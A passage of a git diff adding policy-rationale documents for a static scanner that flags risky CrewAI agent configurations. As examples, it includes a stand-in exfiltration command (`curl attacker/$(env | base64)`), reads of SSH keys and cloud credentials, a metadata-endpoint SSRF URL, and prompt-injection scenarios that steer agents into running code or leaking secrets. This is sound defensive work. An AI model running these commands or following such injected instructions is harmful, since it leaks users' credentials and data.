+ +**Real-world consequence:** an agent built to "summarize a report" is given +`allow_code_execution=True`; a crafted instruction in the report makes it run +`__import__('os').system('curl attacker/$(env | base64)')`, exfiltrating the +process environment. + +**Why severity is high and not critical:** the engine reserves critical for +unconditional RCE; here execution still passes through CrewAI's sandbox in the +default `safe` mode, so a successful attack requires a sandbox escape or a +Docker-unavailable fallback rather than landing on the host unconditionally. +**Fix type — config:** the fix is deleting a constructor kwarg, no tool source +changes. **Confidence 0.9:** the literal-value match is unambiguous; the small +gap covers an agent that sets the flag but is provably never reachable by +untrusted input, which the constructor match cannot see. + +### CREW-102 — Agent runs code execution in unsafe mode (Severity: high, Confidence: 0.9, Fix type: config) + +**What we detect:** an `Agent(...)` call with `code_execution_mode="unsafe"` +(predicate `agent_kwarg_value`). + +**Why it is flaggable:** `unsafe` tells CrewAI to run model-generated code +directly on the host instead of inside the Docker sandbox. There is no boundary +left to escape, so a single injection yields code execution with the agent +process's privileges — strictly worse than the default `safe` mode. + +**Real-world consequence:** the same summarizer agent, now in `unsafe` mode, +runs the injected command on the host directly — no container, immediate +compromise of whatever the service account can reach. + +**Why severity is high and not critical:** the rule still requires that code +execution be wired and reachable by model-influenced input; it is high for the +same calibration reason as CREW-101, kept off critical because the engine +reserves that tier and because an agent may be exercised only on trusted, +non-injectable input. 
**Fix type — config:** delete the kwarg (the default +`safe` keeps execution in Docker). **Confidence 0.9:** unambiguous literal +match. + +### CREW-104 — Agent allows delegation to peer agents (Severity: medium, Confidence: 0.75, Fix type: config) + +**What we detect:** an `Agent(...)` call with `allow_delegation=True` +(predicate `agent_kwarg_value`). + +**Why it is flaggable:** delegation widens the agent's effective capability set +to that of every peer it can reach, with no per-delegation gate — a +confused-deputy path to any high-risk tool held by a peer. + +**Real-world consequence:** a low-privilege "researcher" agent with +`allow_delegation=True` is prompt-injected to delegate to a "coder" peer that +holds the code interpreter, reaching execution it was never granted. + +**Why severity is medium and not high:** delegation is only dangerous in +proportion to what the reachable peers can do; a crew where no peer holds a +risky tool is exposed to nothing worse than wasted turns, so the impact is +conditional in a way code execution is not. **Fix type — config:** flip the +constructor kwarg. **Confidence 0.75:** the rule cannot see whether any +reachable peer actually holds a dangerous capability, so it over-flags benign +all-read-only crews — the gap that drops it below the code-execution rules. + +--- + +## What this policy does not cover + +- Code execution wired by hand rather than via the flag — an `Agent` whose + `tools=[...]` lists `CodeInterpreterTool` directly is caught by **CREW-103** + (code_execution.md), not here. +- Whether the agent's input is actually reachable by untrusted content. The + rules flag the capability grant, not a proven injection path, so an agent + exercised only on trusted input is a (deliberate) false positive. +- Delegation risk is judged structurally: CREW-104 does not resolve the peer + graph to confirm a dangerous capability is reachable, so it neither suppresses + on a safe crew nor escalates on a dangerous one. 
+- `Crew`-level execution settings and the `Process` topology (sequential vs. + hierarchical) that influence which agents can delegate are out of scope. + +--- + +## Recommendations beyond the fix + +```python +from crewai import Agent + +# Safe form: no in-process code execution, no open delegation. +researcher = Agent( + role="Researcher", + goal="Summarize the supplied report", + backstory="...", + allow_code_execution=False, # never inject the in-process interpreter + allow_delegation=False, # keep the trust boundary at this agent + tools=[vetted_search_tool], # only the minimum the role needs +) +``` + +1. If code execution is a genuine product requirement, run it **outside CrewAI** + in a hardened external sandbox (E2B, Modal, or an isolated runner with no + filesystem, no network, no credentials, and a hard timeout) and gate every + run behind explicit human approval. +2. If the crew must delegate, keep high-risk tools (code execution, file read, + shell) off every agent reachable through delegation, and constrain each + peer's tool set to the minimum its role requires. +3. Prefer the default `safe` execution mode unconditionally; never set + `code_execution_mode="unsafe"` even in development, where a stray injection + on a developer machine reaches the host directly. +4. Treat retrieved content and prior tool output as untrusted — they are the + model-reachable surface a prompt injection rides in on. 
diff --git a/docs/Policy/crewai/code_execution.md b/docs/Policy/crewai/code_execution.md new file mode 100644 index 0000000..0259143 --- /dev/null +++ b/docs/Policy/crewai/code_execution.md @@ -0,0 +1,170 @@ +--- +policy_id: crewai_code_execution +category: crewai +topic: code_execution +rules: + - id: CREW-003 + severity: high + confidence: 0.85 + scope: tool + fix_type: code + - id: CREW-103 + severity: high + confidence: 0.85 + scope: agent + fix_type: config +references: [LLM05] +--- + +# Policy Rationale: CrewAI Code-Execution Safety + +**Policy ID:** `crewai_code_execution` +**File:** `crewai/code_execution.yaml` +**Rules:** CREW-003, CREW-103 +**Severities:** high, high +**Fix types:** code, config +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +Two routes to model-selected code execution in CrewAI. **CREW-103** (agent +scope) fires when an `Agent`'s resolved tool set includes `CodeInterpreterTool`, +CrewAI's built-in that runs model-generated Python (predicate +`agent_uses_hosted_tool_class`). **CREW-003** (tool scope) fires when a +`@tool`-decorated CrewAI function's body calls `eval`, `exec`, or `compile` +(predicate `has_code_exec_call`, a bare-builtin AST match — `re.compile` and +other attribute calls do not fire). The two cover the same arbitrary-execution +capability reached two ways: by wiring the built-in, or by hand-rolling it +inside a tool body. + +--- + +## Why dynamic code execution is a distinct concern in CrewAI tools + +In a conventional program, `eval`/`exec` runs a string the developer wrote. In +a model-callable tool, the model writes or steers the string. With any +model-influenced input, dynamic evaluation is arbitrary code execution inside +the agent process — no OS sandbox stands between the call and the runtime's +imports, file handles, and in-memory credentials. 
The blast radius is the whole +process: a single evaluated string can reach `os.environ` for API keys, read or +write any file the process can touch, or spawn a subprocess. + +The CrewAI-specific sharpening is that this is the same capability behind +CrewAI's own published advisories. `CodeInterpreterTool` is the built-in form; +the CERT remediation for CVE-2026-2275 (SandboxPython `ctypes` escape) and +CVE-2026-2287 (Docker-availability fallback to host execution) is literally to +remove or disable the Code Interpreter Tool. Hand-rolling `eval`/`exec` inside a +`@tool` body (CREW-003) carries the identical risk while bypassing whatever +sandboxing the built-in would have applied — it is the built-in's danger with +none of its mitigations, hidden inside an ordinary-looking tool. + +--- + +## Rule-by-rule defense + +### CREW-003 — Tool body evaluates dynamic code (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a CrewAI `@tool`-decorated function whose body calls the +bare `eval`, `exec`, or `compile` builtin (predicate `has_code_exec_call`, an +AST callee match, not a substring scan). + +**Why it is flaggable:** dynamic evaluation in a model-callable tool is an +arbitrary-code-execution surface whenever any part of the evaluated string +originates with the model. The presence of the primitive is the signal. + +**Real-world consequence:** a `calculate(expr)` tool implemented as +`return eval(expr)` is driven by an injected instruction into +`__import__('os').environ` to read secrets, or into reading/writing files the +process can touch. + +**Why severity is high and not critical:** no in-band sandbox stands between the +call and the full runtime, so the only reliable fix is removing dynamic +evaluation; it is not raised to critical because the engine reserves that tier +and because the exposure depends on whether the evaluated string is actually +model-influenced. 
**Fix type — code:** removing `eval`/`exec`/`compile` is an +edit to the tool's own source. **Confidence 0.85:** the bare-callee match avoids +the `re.compile` false positive, but a dynamic-eval helper in another module, or +evaluation via `types.FunctionType` / `marshal` / `pickle.loads`, escapes the +body-only walk. + +### CREW-103 — Agent wires the code-interpreter built-in tool (Severity: high, Confidence: 0.85, Fix type: config) + +**What we detect:** an `Agent` whose resolved tool set includes +`CodeInterpreterTool` (predicate `agent_uses_hosted_tool_class`). + +**Why it is flaggable:** `CodeInterpreterTool` executes model-generated Python. +Once it is in the tool set, a prompt injection or a confused model can run +attacker-chosen code in the agent process — the same capability +`allow_code_execution=True` auto-injects (CREW-101), reached here by wiring the +tool by hand. It is the documented vector behind CVE-2026-2275 and +CVE-2026-2287. + +**Real-world consequence:** an agent's `tools=[search, CodeInterpreterTool()]` +gives a prompt-injected model a direct interpreter; the injection runs arbitrary +Python with the agent's privileges, escaping the sandbox via the ctypes path of +CVE-2026-2275 when the SandboxPython interpreter is in use. + +**Why severity is high and not critical:** identical calibration to CREW-101 — +execution passes through CrewAI's sandbox by default, so a successful attack +needs a sandbox escape or the Docker-unavailable host fallback rather than +landing on the host unconditionally. **Fix type — config:** the fix is removing +the tool from the agent's `tools=[...]`, an agent-wiring change, not a tool +source edit. **Confidence 0.85:** the class-name match cannot see whether a team +has wrapped the interpreter in an out-of-band sandbox, so a few legitimately +hardened uses are over-flagged. 
+ +--- + +## What this policy does not cover + +- `allow_code_execution=True` and `code_execution_mode="unsafe"` — the + constructor-flag routes to the same interpreter are caught by **CREW-101 / + CREW-102** (agent_safety.md), not here. +- For CREW-003: dynamic evaluation reached through a helper in another module + (the walk sees only the tool body), and alternative dynamic-code primitives + (`types.FunctionType`, `marshal.loads`, `pickle.loads`, `importlib`-driven + loading). Evaluations whose argument is provably a constant literal still fire + — the predicate flags the presence of the primitive, not proof of + model-control. +- For CREW-103: a custom subclass of `CodeInterpreterTool` under a different + class name, or a third-party interpreter tool, is not in the matched class + set. Whether the interpreter is sandboxed out of band is not visible to the + class-name match. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool +import ast +import operator + +# Replace `eval(expr)` with a constrained evaluator that runs no code: walk the +# parsed tree and apply a fixed operator table, so the tool calls neither `eval` +# nor `compile`. `**` is deliberately absent (unbounded result size). +_BINARY = {ast.Add: operator.add, ast.Sub: operator.sub, + ast.Mult: operator.mul, ast.Div: operator.truediv} +_UNARY = {ast.USub: operator.neg, ast.UAdd: operator.pos} + +def _fold(node): + """Reduce a numeric literal/operator tree to a number, else raise ValueError.""" + if isinstance(node, ast.Constant) and type(node.value) in (int, float): + return node.value + if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY: + return _UNARY[type(node.op)](_fold(node.operand)) + if isinstance(node, ast.BinOp) and type(node.op) in _BINARY: + return _BINARY[type(node.op)](_fold(node.left), _fold(node.right)) + raise ValueError("disallowed syntax") + +@tool("calculate") +def calculate(expr: str) -> str: + """Evaluate a constant arithmetic expression and return the result. + Rejects anything that is not a literal/operator tree.""" + try: + return str(_fold(ast.parse(expr, mode="eval").body)) + except (SyntaxError, ValueError, ArithmeticError, RecursionError): + return "error: not a valid arithmetic expression" +``` + +1. Remove `CodeInterpreterTool` from production agents. If code execution is a + genuine requirement, run it **outside CrewAI** in a hardened external sandbox + (no filesystem, no network, no credentials, hard timeout) and gate it behind + explicit human approval. +2.
For parsing literal data, prefer `ast.literal_eval` (data only, no calls) over + any evaluator; reserve a constrained AST walk for arithmetic, which it rejects. +3. Keep application secrets out of the process that hosts any + evaluation-capable tool — assume an evaluated string can read the whole + environment. +4. Log every interpreter invocation with the session ID and the model that + requested it, so an incident can be reconstructed. diff --git a/docs/Policy/crewai/dangerous_tools.md b/docs/Policy/crewai/dangerous_tools.md new file mode 100644 index 0000000..6ed7ad0 --- /dev/null +++ b/docs/Policy/crewai/dangerous_tools.md @@ -0,0 +1,160 @@ +--- +policy_id: crewai_dangerous_tools +category: crewai +topic: dangerous_tools +rules: + - id: CREW-106 + severity: high + confidence: 0.7 + scope: agent + fix_type: config + - id: CREW-107 + severity: medium + confidence: 0.7 + scope: agent + fix_type: config +references: [LLM02, LLM06] +--- + +# Policy Rationale: CrewAI Dangerous Built-in Tools + +**Policy ID:** `crewai_dangerous_tools` +**File:** `crewai/dangerous_tools.yaml` +**Rules:** CREW-106, CREW-107 +**Severities:** high, medium +**Fix types:** config, config +**References:** LLM02 (Sensitive Information Disclosure), LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Agent-scope rules for two classes of high-risk `crewai_tools` built-ins wired +onto an `Agent`. **CREW-106** fires when the agent wires `FileReadTool` with no +`file_path=` pin (predicate: `agent_uses_hosted_tool_class` for `FileReadTool` +AND `not agent_hosted_tool_kwarg_present` for its `file_path` kwarg). **CREW-107** +fires when the agent wires any of the web-fetching / RAG built-ins that retrieve +a model-chosen URL — `ScrapeWebsiteTool`, `SeleniumScrapingTool`, +`WebsiteSearchTool`, `SerperDevTool`, `JSONSearchTool`, `PDFSearchTool`, or +`CSVSearchTool` (predicate `agent_uses_hosted_tool_class`). Both read the +agent's resolved tool edges, not any tool body.
+ +--- + +## Why model-controlled file and URL targets are a distinct concern in CrewAI + +Both rules describe the same failure: a built-in tool whose *target* is chosen +by the model at call time, on an agent whose prompt surface is model-reachable. +An unpinned `FileReadTool` reads whatever path the model names — so a prompt +injection can make it read `/etc/passwd`, `~/.ssh/id_rsa`, or the application's +secrets file. That arbitrary-file-read exposure is exactly what CVE-2026-2285 +(path traversal in the file-read tool) describes. Pinning the tool to a specific +file at construction removes the model's control over the target, which is why +`FileReadTool(file_path="...")` is the safe form and does not fire. + +The web-fetching built-ins (CREW-107) are a server-side request forgery surface. +Because the destination is model-controlled, a prompt injection can point a +scraper or RAG retriever at internal services or the cloud metadata endpoint +(169.254.169.254) to exfiltrate credentials — the exposure tracked as +CVE-2026-2286. There is a second-order channel too: the retrieved page content +re-enters the conversation as untrusted text, giving the fetched site its own +prompt-injection path into the agent. So the tool is both an outbound SSRF +primitive and an inbound injection vector in one. + +--- + +## Rule-by-rule defense + +### CREW-106 — Agent grants an unconstrained FileReadTool (Severity: high, Confidence: 0.7, Fix type: config) + +**What we detect:** an `Agent` that wires `FileReadTool` without a `file_path=` +argument (predicates `agent_uses_hosted_tool_class` + `not +agent_hosted_tool_kwarg_present`). + +**Why it is flaggable:** with no pinned path the tool reads any file the agent +process can see, at a path the model chooses — arbitrary file read on the model's +say-so, the CVE-2026-2285 exposure. 
+ +**Real-world consequence:** an agent given `FileReadTool()` to "read the project +README" is injected to read `~/.aws/credentials`; the contents flow back into the +model context and out to the caller. + +**Why severity is high and not critical:** arbitrary file read is serious but is +read-only and bounded by the process's filesystem permissions; it is not the +unconditional code execution the engine reserves critical for. **Fix type — +config:** the fix is constructing the tool with a pinned `file_path=`, an +agent-wiring change. **Confidence 0.7:** the rule cannot tell whether the agent's +input is reachable by untrusted content, and an agent that legitimately needs to +read several validated paths (and does its own allow-listing) is over-flagged — +the gap that holds it at 0.7. + +### CREW-107 — Agent wires a tool that fetches model-chosen URLs (Severity: medium, Confidence: 0.7, Fix type: config) + +**What we detect:** an `Agent` that wires one of the listed scraper / search / +RAG built-ins (predicate `agent_uses_hosted_tool_class`). + +**Why it is flaggable:** these tools issue outbound requests to a model-supplied +URL, an SSRF primitive (CVE-2026-2286), and feed the retrieved content back into +the conversation as untrusted text. + +**Real-world consequence:** an agent with `ScrapeWebsiteTool()` is injected to +fetch `http://169.254.169.254/latest/meta-data/iam/security-credentials/`, and +the returned cloud credentials are exfiltrated through the model's next output. + +**Why severity is medium and not high:** the impact depends on the network the +agent host sits in — an agent with no reachable internal services or metadata +endpoint, or behind an egress proxy, gets a much smaller blast radius than the +unconstrained file read of CREW-106, so the capability is flagged at medium. +**Fix type — config:** drop or constrain the tool at the agent, plus egress +controls — no tool source edit. 
**Confidence 0.7:** the rule flags the tool's +presence, not a proven reachable internal target, so it over-flags agents that +only ever fetch vetted external URLs or run behind a strict egress allow-list. + +--- + +## What this policy does not cover + +- A *pinned* `FileReadTool(file_path="...")` does not fire (by design) — but the + rule does not verify that the pinned path is itself safe or non-sensitive. +- File read or URL fetch implemented by hand inside a `@tool` body rather than + via these built-ins. Hand-rolled SSRF is caught by **CREW-005** (ssrf.md); + there is no tool-scope CrewAI rule for hand-rolled arbitrary file read, so a + custom file-reading tool body is a coverage gap. +- A custom subclass of any of these built-ins under a different class name, or a + third-party scraper/RAG tool not in the listed set, is not matched. +- Whether the agent's prompt surface is actually reachable by untrusted input — + both rules flag the capability grant, not a proven injection path. +- Egress and filesystem controls applied at the OS/container layer are invisible + to the class-name match, so an agent that is in fact sandboxed still fires. + +--- + +## Recommendations beyond the fix + +```python +from crewai import Agent +from crewai_tools import FileReadTool + +# Pin the file reader to the one file the agent needs; the model cannot +# redirect it. For web access, prefer a fixed-endpoint tool over an open scraper. +agent = Agent( + role="Release notes writer", + goal="Draft notes from the changelog", + backstory="...", + tools=[FileReadTool(file_path="docs/CHANGELOG.md")], # pinned target +) +``` + +1. Construct `FileReadTool(file_path="...")` bound to the one file the agent + needs. If it must read several files, validate every candidate against an + allow-list of directories, resolve symlinks, and reject any path that escapes + the intended root (`Path(p).resolve().is_relative_to(root)` — never string + prefix matching). +2. 
For URL-fetching tools, validate every destination against an allow-list of + hosts, reject private and link-local IP ranges (and redirects into them), and + forbid raw model-supplied URLs. Put an egress proxy in front of the agent + process that blocks the metadata endpoint and internal CIDRs. +3. Treat any retrieved page content as untrusted input — keep it out of the + system prompt and do not let it silently expand the agent's tool permissions. +4. Prefer a purpose-built tool that fetches from a fixed, vetted set of + endpoints over an open scraper or RAG retriever. diff --git a/docs/Policy/crewai/idempotency.md b/docs/Policy/crewai/idempotency.md new file mode 100644 index 0000000..3083ea0 --- /dev/null +++ b/docs/Policy/crewai/idempotency.md @@ -0,0 +1,126 @@ +--- +policy_id: crewai_idempotency +category: crewai +topic: idempotency +rules: + - id: CREW-006 + severity: medium + confidence: 0.55 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: CrewAI Mutating-Tool Idempotency + +**Policy ID:** `crewai_idempotency` +**File:** `crewai/idempotency.yaml` +**Rules:** CREW-006 +**Severities:** medium +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +CrewAI tools whose name implies a side effect but which take no idempotency key. +**CREW-006** fires when a `@tool` function's name starts with one of `create_`, +`send_`, `delete_`, `post_`, `update_`, `refund_`, `charge_`, `issue_` +(predicate `name_has_prefix`) AND no parameter name contains `idempot` or is +exactly `request_id` / `txn_id` (predicate `param_name_matches`, negated). It is +a name-and-signature heuristic — it does not read the tool body. + +--- + +## Why missing idempotency is a distinct concern in CrewAI tools + +A mutating tool that runs twice does its side effect twice: a duplicate charge, a +double-sent message, a repeated delete. 
In ordinary code a developer controls how +often a function is called; in an agent the *framework* re-invokes tools. CrewAI +retries tool calls under timeouts and ambiguous failures, and the agent loop can +re-select the same tool across turns — so the same side-effecting action can fire +more than once without the author writing any retry logic. The classic trigger is +a timeout: the backend processed the request but the response was lost, so from +the agent's side the call "failed" and is retried, and the action happens again. + +An idempotency key closes this: the tool sends a stable key the backend uses to +recognize a retried request and return the original result instead of +re-executing. Without it, the agent's own retry behavior turns a transient +network blip into a duplicated real-world effect. This is an excessive-agency +(LLM06) reliability hazard — the agent can take a consequential action more times +than intended. The protection only holds end to end if the downstream service +also honors the key; the parameter is necessary but not sufficient on its own. + +--- + +## Rule-by-rule defense + +### CREW-006 — Mutating tool has no idempotency key (Severity: medium, Confidence: 0.55, Fix type: code) + +**What we detect:** a `@tool` whose name begins with a mutation prefix +(`create_`, `send_`, `refund_`, …) and which has no parameter named for an +idempotency key (`*idempot*`, `request_id`, or `txn_id`). + +**Why it is flaggable:** the name signals a side effect, and CrewAI's retry and +re-selection behavior can fire that side effect twice; without a key there is no +mechanism for the backend to deduplicate. + +**Real-world consequence:** a `charge_card(customer, amount)` tool times out +after the charge succeeds; CrewAI retries, and the customer is charged twice with +no key for the payment processor to collapse the duplicate. 
+ +**Why severity is medium and not high:** the duplicate fires only on a retry path +(timeout or ambiguous failure), not on every call, and many backends are already +idempotent for other reasons — so the impact is real but probabilistic rather +than guaranteed. **Fix type — code:** adding an `idempotency_key` parameter and +threading it to the API is a tool-source change. **Confidence 0.55:** this is a +name heuristic, so a tool named `update_cache` that mutates nothing fires (false +positive), a side-effecting tool named `process_payment` without a mutation +prefix does not (false negative), and a tool that achieves idempotency through an +unnamed mechanism (a natural key in the body) is over-flagged — the low number +reflects all three gaps. + +--- + +## What this policy does not cover + +- Side-effecting tools whose name does not start with a listed prefix + (`process_`, `apply_`, `submit_`, `transfer_`) — they are false negatives. +- Tools that achieve idempotency without a matching parameter name — e.g. by + deriving a natural key inside the body, or because the backend dedupes on a + business field. The signature heuristic cannot see body logic, so these fire + anyway. +- Read-only tools that happen to match a prefix (`update_view_count` that only + reads) — a false positive. +- Whether the downstream service actually honors the key. The rule checks for a + parameter, not that retries are truly deduplicated end to end. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool + +@tool("charge_card") +def charge_card(customer_id: str, amount_cents: int, idempotency_key: str) -> str: + """Charge a customer. `idempotency_key` must be stable across retries so a + re-sent request is collapsed by the processor instead of charging twice.""" + return payments.charge( + customer=customer_id, + amount=amount_cents, + idempotency_key=idempotency_key, # backend dedupes on this + ) +``` + +1. 
Add an `idempotency_key: str` parameter to every mutating tool and pass it + through to the backing API so a retried call is recognized and deduplicated. +2. Make the key stable for a logical operation — derive it from the operation's + inputs (e.g. a hash of customer + amount + intent) so the same retried action + reuses the same key. +3. Confirm the downstream service honors the key; an idempotency parameter the + backend ignores gives no protection. +4. Where the backend cannot dedupe, guard at the application layer (a + processed-operations table keyed by the idempotency key) before performing the + side effect. diff --git a/docs/Policy/crewai/repo_hygiene.md b/docs/Policy/crewai/repo_hygiene.md new file mode 100644 index 0000000..8c869fc --- /dev/null +++ b/docs/Policy/crewai/repo_hygiene.md @@ -0,0 +1,121 @@ +--- +policy_id: crewai_repo_hygiene +category: crewai +topic: repo_hygiene +rules: + - id: CREW-201 + severity: low + confidence: 0.9 + scope: repo + fix_type: config +references: [LLM06] +--- + +# Policy Rationale: CrewAI Repo Hygiene + +**Policy ID:** `crewai_repo_hygiene` +**File:** `crewai/repo_hygiene.yaml` +**Rules:** CREW-201 +**Severities:** low +**Fix types:** config +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +A single repo-scope rule that fires once per scan. **CREW-201** fires when the +repo uses CrewAI in code (predicate `repo_has_sdk_in_code` for `crewai`) but ships +no agent-guidance doc — neither `AGENTS.md` nor `CLAUDE.md` is present as a +discovered repo component (predicate `repo_component_present`, negated). It reads +the scan inventory, not any single file. + +--- + +## Why a missing agent-guidance doc is a distinct concern for CrewAI projects + +`AGENTS.md` is the cross-vendor convention an editing coding agent reads before it +acts on a repository. 
When neither it nor a `CLAUDE.md` is present, any agent that +opens this repo has no project-specific guidance on how its agents and tools must +be configured. For a CrewAI project specifically, that means nothing in-tree tells +the agent whether `allow_code_execution` or the `CodeInterpreterTool` are +permitted, how tools must be defined and guarded, whether delegation is allowed, +and what the local test and build commands are. The likely consequence is +generated code that violates the project's own safety contract — an agent +re-introducing `allow_code_execution=True` or a hand-rolled `subprocess` tool +because nothing taught it the local rules. This is a soft, preventive form of +excessive-agency risk (LLM06): the guardrail that should constrain an editing +agent's choices is simply absent, so the agent operates with more latitude than +the maintainers intend. + +--- + +## Rule-by-rule defense + +### CREW-201 — Project ships no agent-guidance doc (Severity: low, Confidence: 0.9, Fix type: config) + +**What we detect:** a repo that uses CrewAI in code but has neither `AGENTS.md` +nor `CLAUDE.md` at the root (predicates `repo_has_sdk_in_code` + `not +repo_component_present`). + +**Why it is flaggable:** without an in-tree guidance doc, an editing agent has no +project-specific rules to follow and will reproduce unsafe patterns the +maintainers would reject. + +**Real-world consequence:** a developer asks a coding agent to "add a tool that +runs the build"; with no `AGENTS.md` stating that shell-running tools are +forbidden, the agent writes a `subprocess.run(..., shell=True)` tool and wires it +to a code-executing agent — exactly the patterns the other CrewAI rules flag. + +**Why severity is low and not medium:** the absence of the doc causes no harm by +itself; it only raises the probability that *other* defects get introduced, so it +is a preventive nudge rather than a live vulnerability. 
**Fix type — config:** +the fix is adding a documentation file at the repo root — no application or tool +code changes. **Confidence 0.9:** presence of `AGENTS.md` / `CLAUDE.md` is an +unambiguous inventory check; the small gap covers projects that document agent +guidance somewhere the component scan does not recognize (a wiki, a nested doc). + +--- + +## What this policy does not cover + +- The *content* or *quality* of an `AGENTS.md`. An empty or stale file satisfies + the rule; the rule checks presence, not whether the guidance is correct or + followed. +- Guidance kept somewhere other than a root `AGENTS.md` / `CLAUDE.md` — a wiki, a + `CONTRIBUTING.md`, or a nested per-package doc the component scan does not map + to these names — counts as absent. +- Whether any agent actually reads the doc. The rule cannot verify that an + editing agent honors the guidance. +- It is a repo-scope nudge, not a per-agent or per-tool check — it says nothing + about the safety of any individual agent or tool in the repo. + +--- + +## Recommendations beyond the fix + +```markdown + +# Agent guidance + +## Safety rules +- Code execution is **forbidden**: never set `allow_code_execution=True` or wire + `CodeInterpreterTool`. Run code only in the external sandbox at `tools/sandbox`. +- Tools must not shell out (`subprocess`, `os.system`) and must not fetch + model-supplied URLs without the allow-list in `net/guard.py`. +- Every mutating tool takes an `idempotency_key`. + +## Commands +- Test: `pytest` +- Lint: `ruff check .` +- Build: `make build` +``` + +1. Add an `AGENTS.md` at the repo root (a `CLAUDE.md` also satisfies the rule). +2. State whether code execution is permitted and under what guard, how tools must + be defined and constrained, and any required human-in-the-loop gates. +3. List the exact test, lint, and build commands so an editing agent can verify + its own changes. +4. 
Keep it short and concrete so an editing agent can act on it without + re-deriving the conventions — and keep it current as the safety contract + evolves. diff --git a/docs/Policy/crewai/shell_safety.md b/docs/Policy/crewai/shell_safety.md new file mode 100644 index 0000000..154c085 --- /dev/null +++ b/docs/Policy/crewai/shell_safety.md @@ -0,0 +1,125 @@ +--- +policy_id: crewai_shell_safety +category: crewai +topic: shell_safety +rules: + - id: CREW-004 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM05] +--- + +# Policy Rationale: CrewAI Shell-Execution Safety + +**Policy ID:** `crewai_shell_safety` +**File:** `crewai/shell_safety.yaml` +**Rules:** CREW-004 +**Severities:** high +**Fix types:** code +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +CrewAI `@tool`-decorated function bodies that spawn an OS process. The detection +is the structured `has_shell_call` predicate: it walks the function's AST and +fires on any call whose resolved callee is `os.system`, `os.popen`, a +`subprocess.*` member (`subprocess.run`, `.Popen`, `.call`, `.check_output`, +`.check_call`, …), or an `os.spawn*` member. Because it matches the resolved +callee rather than raw text, a `subprocess.run(` mentioned in a comment or +docstring does not fire. + +--- + +## Why shell execution is a distinct concern in CrewAI tools + +In a conventional program a subprocess call has a fixed callsite the developer +wrote; the only variability is parameter substitution they approved. In a +model-callable CrewAI tool the model writes or selects the command, and the SDK +imposes no enforcement — the model can return strings that bend the surrounding +command structure, and the tool faithfully runs whatever it builds. Shell +execution selected by model output is the most direct path from prompt injection +to remote code execution. 
+ +The blast radius is the entire process: the subprocess inherits the agent's +working directory, environment variables (including API keys), filesystem +credentials, and outbound network access. The CrewAI-specific sharpening is that +CrewAI ships **no** built-in shell-tool class, so unlike frameworks with a +first-class `ShellTool`, a tool that shells out by hand is the *only* shell +surface in a CrewAI project — and it hides inside an ordinary-looking `@tool`. +That makes the hand-rolled `subprocess.run(cmd, shell=True)` the exact shape a +reviewer must hunt for, because nothing else in the framework will flag it. + +--- + +## Rule-by-rule defense + +### CREW-004 — Tool body spawns a subprocess (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a CrewAI `@tool`-decorated function whose body invokes +`os.system`, `os.popen`, a `subprocess.*` function, or an `os.spawn*` function +(predicate `has_shell_call`, an AST callee walk, not a substring scan). + +**Why it is flaggable:** process spawn from a model-callable tool puts the OS +shell on the model's tool surface. The presence of the spawn is the signal; +every safeguard is bolted onto an inherently broad primitive. + +**Real-world consequence:** a `run(cmd)` tool forwarding a model string into +`subprocess.run(cmd, shell=True)` is one prompt injection from arbitrary command +execution with the agent's privileges — e.g. an injected +`cmd="cat ~/.ssh/id_rsa"` leaks the private key into the model context. + +**Why severity is high and not critical:** the fix usually means removing the +spawn or rearchitecting behind a typed API; it is not raised above high because +the exposure depends on what the caller does with the spawn, and the engine +reserves critical for unconditional RCE. **Fix type — code:** replacing the +spawn (or fronting it with an allow-list) is a tool-source edit. 
**Confidence +0.85:** the `subprocess.*` prefix over-fires on the rare non-spawning helper +(`subprocess.list2cmdline`), and async/`pty` spawn primitives escape the body +walk. + +--- + +## What this policy does not cover + +- `asyncio.create_subprocess_exec` / `asyncio.create_subprocess_shell`, + `pty.spawn`, `pexpect.spawn`, `multiprocessing.Process`, and the `os.exec*` + family — none are in the matched callee set. +- A spawn wrapped behind a helper defined in another module — the rule scans the + tool body only. +- Whether the spawned command is safe. A literal `subprocess.run(["ls", "/tmp"], + shell=False)` fires even though it is comparatively benign — the predicate + flags the presence of the primitive, not proof of model-control. +- File-system writes, env-var exfiltration, and network exfiltration through + *non-subprocess* primitives belong to other policies. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool +import shutil + +# Replace `subprocess.run("du -sh " + path, shell=True)` with a typed API. +@tool("disk_usage") +def disk_usage(path: str) -> str: + """Return free/used disk space for the volume containing `path`.""" + usage = shutil.disk_usage(path) + return f"total={usage.total} used={usage.used} free={usage.free}" +``` + +1. Replace shell-outs with a typed library call wherever one exists + (`shutil`, `pathlib`, an SDK client) rather than shelling to a CLI. +2. If a subprocess is genuinely unavoidable, build the argv list explicitly and + pass `shell=False`; never interpolate model strings into a `shell=True` + command. Allow-list the exact commands permitted. +3. Always pass `timeout=` — a model can request an infinitely-running command. +4. Run the agent in a sandbox container with a read-only root filesystem, + dropped capabilities, and a network egress allow-list; drop sensitive env + vars from the subprocess (`env={...}` with only what the command needs). +5. 
